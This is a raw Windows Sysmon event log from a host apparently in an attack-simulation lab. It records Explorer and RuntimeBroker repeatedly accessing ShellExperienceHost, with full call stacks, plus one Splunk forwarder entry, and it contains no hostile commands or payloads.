21:43:46.582{39BD8DE3-0FD9-60CA-8B00-00000000D101}19883864C:\Windows\Explorer.EXE{39BD8DE3-0FDA-60CA-8C00-00000000D101}3552C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1b24a|C:\Windows\System32\TwinUI.dll+ace56|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000149608Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:46.582{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9A88A5D93FFB1ECAF07CC367E50AA979,SHA256=66982D88E4D34BD8BA55BA58DB13325CCE00954BE767A738852B9AAF6726E896,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000149607Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:46.582{39BD8DE3-0FD9-60CA-8B00-00000000D101}19883864C:\Windows\Explorer.EXE{39BD8DE3-0FDA-60CA-8C00-00000000D101}3552C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+6d1f|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+68be|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+6966|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+6ab5|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+61c3f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336|C:\Windows\System32\combase.dll+5daea|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae 10341000x8000000000000000149606Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:46.582{39BD8DE3-0FD9-60CA-8B00-00000000D101}19883864C:\Windows\Explorer.EXE{39BD8DE3-0FDA-60CA-8C00-00000000D101}3552C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d4e3|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d7a9|C:\Windows\System32\TwinUI.dll+ba4b0|C:\Windows\System32\TwinUI.dll+b9dbe|C:\Windows\System32\TwinUI.dll+bad73|C:\Windows\System32\TwinUI.dll+bae12|C:\Windows\System32\TwinUI.dll+137bc7|C:\Windows\System32\TwinUI.dll+13854f|C:\Windows\System32\TwinUI.dll+1393c7|C:\Windows\System32\TwinUI.dll+d2034|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149605Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:46.566{39BD8DE3-0FD9-60CA-8B00-00000000D101}19883864C:\Windows\Explorer.EXE{39BD8DE3-0FDA-60CA-8C00-00000000D101}3552C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+ba4b0|C:\Windows\System32\TwinUI.dll+b9dbe|C:\Windows\System32\TwinUI.dll+bad73|C:\Windows\System32\TwinUI.dll+bae12|C:\Windows\System32\TwinUI.dll+137bc7|C:\Windows\System32\TwinUI.dll+13854f|C:\Windows\System32\TwinUI.dll+1393c7|C:\Windows\System32\TwinUI.dll+d2034|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149604Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:46.566{39BD8DE3-0FD9-60CA-8B00-00000000D101}19883864C:\Windows\Explorer.EXE{39BD8DE3-0FDA-60CA-8C00-00000000D101}3552C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+ba4b0|C:\Windows\System32\TwinUI.dll+b9dbe|C:\Windows\System32\TwinUI.dll+bad73|C:\Windows\System32\TwinUI.dll+bae12|C:\Windows\System32\TwinUI.dll+137bc7|C:\Windows\System32\TwinUI.dll+13854f|C:\Windows\System32\TwinUI.dll+1393c7|C:\Windows\System32\TwinUI.dll+d2034|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149603Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:46.566{39BD8DE3-0FD9-60CA-8B00-00000000D101}19883864C:\Windows\Explorer.EXE{39BD8DE3-0FDA-60CA-8C00-00000000D101}3552C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12a37c|C:\Windows\System32\TwinUI.dll+b6084|C:\Windows\System32\TwinUI.dll+b1dcb|C:\Windows\System32\TwinUI.dll+d201a|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149602Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:46.566{39BD8DE3-0FD9-60CA-8B00-00000000D101}19883864C:\Windows\Explorer.EXE{39BD8DE3-0FDA-60CA-8C00-00000000D101}3552C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1b24a|C:\Windows\System32\TwinUI.dll+ace56|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149601Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:46.566{39BD8DE3-0FD9-60CA-8B00-00000000D101}19883864C:\Windows\Explorer.EXE{39BD8DE3-0FDA-60CA-8C00-00000000D101}3552C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1b24a|C:\Windows\System32\TwinUI.dll+ace56|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149600Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:46.566{39BD8DE3-0FD9-60CA-8B00-00000000D101}19883864C:\Windows\Explorer.EXE{39BD8DE3-0FDA-60CA-8C00-00000000D101}3552C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1b24a|C:\Windows\System32\TwinUI.dll+ace56|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149599Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:46.566{39BD8DE3-0FD9-60CA-8B00-00000000D101}19883864C:\Windows\Explorer.EXE{39BD8DE3-0FDA-60CA-8C00-00000000D101}3552C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1b24a|C:\Windows\System32\TwinUI.dll+ace56|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149598Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:46.566{39BD8DE3-0FD9-60CA-8400-00000000D101}37206608C:\Windows\System32\RuntimeBroker.exe{39BD8DE3-0FDA-60CA-8C00-00000000D101}3552C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\System32\shcore.dll+35576|C:\Windows\System32\shcore.dll+201ef|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a 10341000x8000000000000000149597Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:46.566{39BD8DE3-0FD9-60CA-8400-00000000D101}37204336C:\Windows\System32\RuntimeBroker.exe{39BD8DE3-0FDA-60CA-8C00-00000000D101}3552C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\System32\windows.storage.dll+9f28d|C:\Windows\System32\windows.storage.dll+2a448d|C:\Windows\System32\windows.storage.dll+74783|C:\Windows\System32\windows.storage.dll+747fa|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+3d38b|C:\Windows\System32\combase.dll+3e7b2|C:\Windows\System32\combase.dll+63ae3|C:\Windows\System32\combase.dll+3e8cd|C:\Windows\System32\combase.dll+61e6f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336|C:\Windows\System32\combase.dll+5daea|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x8000000000000000149596Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:46.566{39BD8DE3-0FD9-60CA-8400-00000000D101}37204336C:\Windows\System32\RuntimeBroker.exe{39BD8DE3-0FDA-60CA-8C00-00000000D101}3552C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\System32\windows.storage.dll+9f28d|C:\Windows\System32\windows.storage.dll+2ca5c2|C:\Windows\System32\windows.storage.dll+cb155|C:\Windows\System32\windows.storage.dll+74066|C:\Windows\System32\windows.storage.dll+2a43ef|C:\Windows\System32\windows.storage.dll+74783|C:\Windows\System32\windows.storage.dll+747fa|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+3d38b|C:\Windows\System32\combase.dll+3e7b2|C:\Windows\System32\combase.dll+63ae3|C:\Windows\System32\combase.dll+3e8cd|C:\Windows\System32\combase.dll+61e6f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336 10341000x8000000000000000149595Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:46.566{39BD8DE3-0FD9-60CA-8400-00000000D101}37201624C:\Windows\System32\RuntimeBroker.exe{39BD8DE3-0FDA-60CA-8C00-00000000D101}3552C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\System32\shcore.dll+35576|C:\Windows\System32\shcore.dll+201ef|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a 10341000x8000000000000000149594Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:46.551{39BD8DE3-0FD9-60CA-8400-00000000D101}37204336C:\Windows\System32\RuntimeBroker.exe{39BD8DE3-0FDA-60CA-8C00-00000000D101}3552C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\System32\windows.storage.dll+9f28d|C:\Windows\System32\windows.storage.dll+2a448d|C:\Windows\System32\windows.storage.dll+74783|C:\Windows\System32\windows.storage.dll+747fa|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+3d38b|C:\Windows\System32\combase.dll+3e7b2|C:\Windows\System32\combase.dll+63ae3|C:\Windows\System32\combase.dll+3e8cd|C:\Windows\System32\combase.dll+61e6f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336|C:\Windows\System32\combase.dll+5daea|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x8000000000000000149593Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:46.551{39BD8DE3-0FD9-60CA-8400-00000000D101}37204336C:\Windows\System32\RuntimeBroker.exe{39BD8DE3-0FDA-60CA-8C00-00000000D101}3552C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\System32\windows.storage.dll+9f28d|C:\Windows\System32\windows.storage.dll+2ca5c2|C:\Windows\System32\windows.storage.dll+cb155|C:\Windows\System32\windows.storage.dll+74066|C:\Windows\System32\windows.storage.dll+2a43ef|C:\Windows\System32\windows.storage.dll+74783|C:\Windows\System32\windows.storage.dll+747fa|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+3d38b|C:\Windows\System32\combase.dll+3e7b2|C:\Windows\System32\combase.dll+63ae3|C:\Windows\System32\combase.dll+3e8cd|C:\Windows\System32\combase.dll+61e6f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336 10341000x8000000000000000149592Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:46.551{39BD8DE3-0FD9-60CA-8400-00000000D101}37201624C:\Windows\System32\RuntimeBroker.exe{39BD8DE3-0FDA-60CA-8C00-00000000D101}3552C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\System32\shcore.dll+35576|C:\Windows\System32\shcore.dll+201ef|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a 10341000x8000000000000000149591Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:46.549{39BD8DE3-0FD9-60CA-8400-00000000D101}37204336C:\Windows\System32\RuntimeBroker.exe{39BD8DE3-0FDA-60CA-8C00-00000000D101}3552C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\System32\windows.storage.dll+9f28d|C:\Windows\System32\windows.storage.dll+c6b73|C:\Windows\System32\windows.storage.dll+c62e1|C:\Windows\System32\windows.storage.dll+c61f5|C:\Windows\System32\windows.storage.dll+c618e|C:\Windows\System32\windows.storage.dll+11c559|C:\Windows\System32\windows.storage.dll+61096|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+3d38b|C:\Windows\System32\combase.dll+3e7b2|C:\Windows\System32\combase.dll+63ae3|C:\Windows\System32\combase.dll+3e8cd|C:\Windows\System32\combase.dll+61e6f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336 10341000x8000000000000000149590Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:46.549{39BD8DE3-0FD9-60CA-8400-00000000D101}37204336C:\Windows\System32\RuntimeBroker.exe{39BD8DE3-0FDA-60CA-8C00-00000000D101}3552C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\System32\windows.storage.dll+9f28d|C:\Windows\System32\windows.storage.dll+c94c3|C:\Windows\System32\windows.storage.dll+11c3d0|C:\Windows\System32\windows.storage.dll+11c327|C:\Windows\System32\windows.storage.dll+11c4f7|C:\Windows\System32\windows.storage.dll+61096|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+3d38b|C:\Windows\System32\combase.dll+3e7b2|C:\Windows\System32\combase.dll+63ae3|C:\Windows\System32\combase.dll+3e8cd|C:\Windows\System32\combase.dll+61e6f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336|C:\Windows\System32\combase.dll+5daea 10341000x8000000000000000149589Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:46.548{39BD8DE3-0FD9-60CA-8400-00000000D101}37204336C:\Windows\System32\RuntimeBroker.exe{39BD8DE3-0FDA-60CA-8C00-00000000D101}3552C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\System32\windows.storage.dll+9f28d|C:\Windows\System32\windows.storage.dll+cb257|C:\Windows\System32\windows.storage.dll+61155|C:\Windows\System32\windows.storage.dll+61078|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+3d38b|C:\Windows\System32\combase.dll+3e7b2|C:\Windows\System32\combase.dll+63ae3|C:\Windows\System32\combase.dll+3e8cd|C:\Windows\System32\combase.dll+61e6f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336|C:\Windows\System32\combase.dll+5daea|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x8000000000000000149588Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:46.548{39BD8DE3-0FD9-60CA-8400-00000000D101}37204336C:\Windows\System32\RuntimeBroker.exe{39BD8DE3-0FDA-60CA-8C00-00000000D101}3552C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\System32\windows.storage.dll+9f28d|C:\Windows\System32\windows.storage.dll+61129|C:\Windows\System32\windows.storage.dll+61078|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+3d38b|C:\Windows\System32\combase.dll+3e7b2|C:\Windows\System32\combase.dll+63ae3|C:\Windows\System32\combase.dll+3e8cd|C:\Windows\System32\combase.dll+61e6f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336|C:\Windows\System32\combase.dll+5daea|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.storage.dll+cc60c 10341000x8000000000000000149587Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 